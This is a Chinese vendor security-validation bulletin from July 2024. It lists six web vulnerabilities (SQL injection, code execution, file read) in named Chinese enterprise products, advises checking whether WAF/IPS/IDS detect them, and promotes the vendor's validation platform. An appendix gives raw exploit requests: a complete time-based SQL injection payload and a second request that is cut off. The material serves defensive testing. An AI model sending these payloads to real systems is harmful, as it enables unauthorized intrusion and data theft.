攻防演习安全验证简报-20240722(4)(1).pdfVIP

安全验证简报-0722

今日更新验证情报：

验证类型具体名称验证建议

WEB漏洞利用1.通天星CMSV6车载定位监控平台disableSQL建议根据企业资产情况，验

注入漏洞证边界侧WAF/IPS/IDS/NT

2.亿赛通数据泄露防护(DLP)系统NetSecConfigAjaA设备是否对这些漏洞利用

xSQL注入漏洞具备拦截和检测能力。如果

3.致远在野ndayconstDef接口存在代码执行漏洞无法拦截或检测，请及时添

4.亿赛通电子文档安全管理系统NoticeAjax接口存加防护策略。

在SQL注入漏洞

5.天问物业ERP系统AreaAvatarDownLoad.aspx

任意文件读取漏洞

6.福建科立讯通信指挥调度管理平台ajax_users.ph

pSQL注入漏洞

验证方式：

1.可以参考附录一中的攻击请求报文，进行验证和修复。

2.已部署知其安“离朱安全验证平台”的用户，可更新场景包直接进行验证。

3.知其安“离朱安全验证云平台（SaaS版）”已在第一时间更新验证用例，目前已开放限

时免费试用申请，用户可以通过申请账户自行进行验证，也可联系我们技术人员协助进行

远程验证。验证时需将验证源IP加白不封禁。

附录一漏洞利用请求报文

1.通天星CMSV6车载定位监控平台disableSQL注入漏洞

GET/edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FRO

M+%28SELECT%28SLEEP%285%29%29%29kOIi%29HTTP/1.1

Host:{{Hostname}}

User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGeck

o)Chrome/75.0.3770.100Safari/537.36

2.亿赛通数据泄露防护(DLP)系统NetSecConfigAjaxSQL注入漏洞

POST/CDGServer3/NetSecConfigAjax;ServiceHTTP/1.1

Host:

Cookie:JSESSIONID=99CEC1B294F4EEEA7AFC46D8D4741917;JSESSIONID=06DCD58EDC037F7

85605A29CD7425C66

Cache-Control:max-age=0

Sec-Ch-Ua:Chromium;v=124,GoogleChrome;v=124,Not-A.Brand;v=99

Sec-Ch-Ua-Mobile:?0

Sec-Ch-Ua-Platform:Windows

Upgrade-Insecure-Requests:1

User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGeck

o)Chrome/Safari/537.36

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/a

png,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Sec-Fetch-Site:cross-site

Sec-Fetch-Mode:navigate

Sec-Fetch-User:?1

Sec-Fetch-Dest:document

Re